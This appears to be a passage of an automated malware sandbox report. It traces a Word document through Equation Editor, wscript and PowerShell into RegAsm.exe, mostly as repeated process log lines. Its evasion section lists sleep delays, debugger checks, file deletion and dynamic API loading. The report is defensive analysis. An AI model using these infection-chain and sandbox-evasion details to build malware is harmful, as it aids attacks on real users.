                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F7E2 Sleep,ExitProcess,9_2_0040F7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_0041A7D9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 361Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1957Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 937Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5658Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9319Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1648Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3360Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep count: 937 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep count: 5658 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -3600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3772Thread sleep count: 268 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3772Thread sleep time: -134000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep count: 133 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep time: -399000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep count: 9319 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep time: -27957000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_9-49356
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00443355 mov eax, dword ptr fs:[00000030h]9_2_00443355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004120B2 GetProcessHeap,HeapFree,9_2_004120B2
